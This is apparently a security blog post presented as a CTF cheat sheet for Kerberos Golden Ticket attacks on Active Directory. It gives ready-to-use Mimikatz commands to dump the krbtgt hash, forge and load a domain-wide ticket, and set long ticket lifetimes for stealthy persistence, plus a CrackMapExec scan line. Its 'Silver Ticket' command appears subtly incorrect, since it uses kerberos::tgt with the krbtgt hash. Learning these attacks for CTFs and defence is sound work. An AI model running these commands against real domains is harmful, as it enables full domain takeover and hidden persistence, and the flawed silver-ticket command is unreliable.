Golden Ticket Attacks

Exploitation
ToxSec

Golden Ticket Attacks

Active Directory (AD) is ubiquitous in enterprise networks, acting as the keystone for authentication and access. As with any system, AD isn’t immune to vulnerabilities. The Golden Ticket attack exemplifies a critical AD weakness, promising attackers unparalleled access once exploited. This article provides a granular, hands-on guide to Golden Ticket attacks for Capture The Flag (CTF) participants. Use it as a quick reference during your challenges.

Understanding the Basics

Golden Tickets: In a Golden Ticket attack, an attacker illicitly crafts a Kerberos Ticket Granting Ticket (TGT). This TGT, being encrypted using the krbtgt account’s NTLM hash, provides almost omnipotent access within the AD domain when utilized correctly.

Golden Ticket Attack

Tools You Need:

  • Mimikatz: Central to extracting key hashes and generating Golden Tickets.
  • PowerShell Empire: Offers post-exploitation and lateral movement capabilities.
  • CrackMapExec (CME): Useful for post-exploitation tasks after obtaining the Golden Ticket.

Initial Access and Privesc

For the Golden Ticket attack to be viable, you first need to compromise the network and elevate privileges:

# Using CrackMapExec to identify weak points and exploit
crackmapexec smb target_network_range

Golden Ticket Attack Cheat Sheet

Extracting the krbtgt Hash:

With domain administrator privileges, the next move is to extract the krbtgt hash:

# Mimikatz command for fetching the krbtgt hash
lsadump::lsa /inject /name:krbtgt

Creating the Golden Ticket:

With the krbtgt hash in hand, it’s time to forge the Golden Ticket:

# Mimikatz command to generate a Golden Ticket
kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Using the Golden Ticket:

Once you’ve created the Golden Ticket, it needs to be loaded into your session:

# Mimikatz to load the Golden Ticket
kerberos::ptt golden_ticket.tkt

From here, you can access resources, execute commands, or perform other actions as if you were an authenticated domain user.

Attack Strategy

  • Stealth and Persistence: It’s possible to set long lifetimes for your Golden Ticket, allowing you to maintain a foothold in the compromised domain for extended periods.
  • Silver Tickets: These are more service-specific than Golden Tickets. They grant targeted access but can often fly under the radar, being less detectable:

# Crafting a Silver Ticket using Mimikatz
kerberos::tgt /rc4:krbtgt_hash_here /domain:target_domain.local /sid:S-1-5-21-XXXXX /service:cifs /server:target_server_name

Quick Reference

krbtgt Hash Extraction:

lsadump::lsa /inject /name:krbtgt

Golden Ticket Creation:

kerberos::golden /user:Administrator /domain:target_domain.local /sid:S-1-5-21-XXXXX /krbtgt:krbtgt_hash_here /ticket:golden_ticket.tkt

Loading the Ticket:

kerberos::ptt golden_ticket.tkt

Closing Thoughts

The Golden Ticket attack serves as a stark reminder of the importance of robust security practices in AD. For the CTF enthusiast, understanding this attack not only bolsters offensive capabilities but also strengthens defensive strategies. Remember to use this knowledge responsibly. The true essence of CTF challenges lies in learning and ethical application.

Related Posts

Back To Top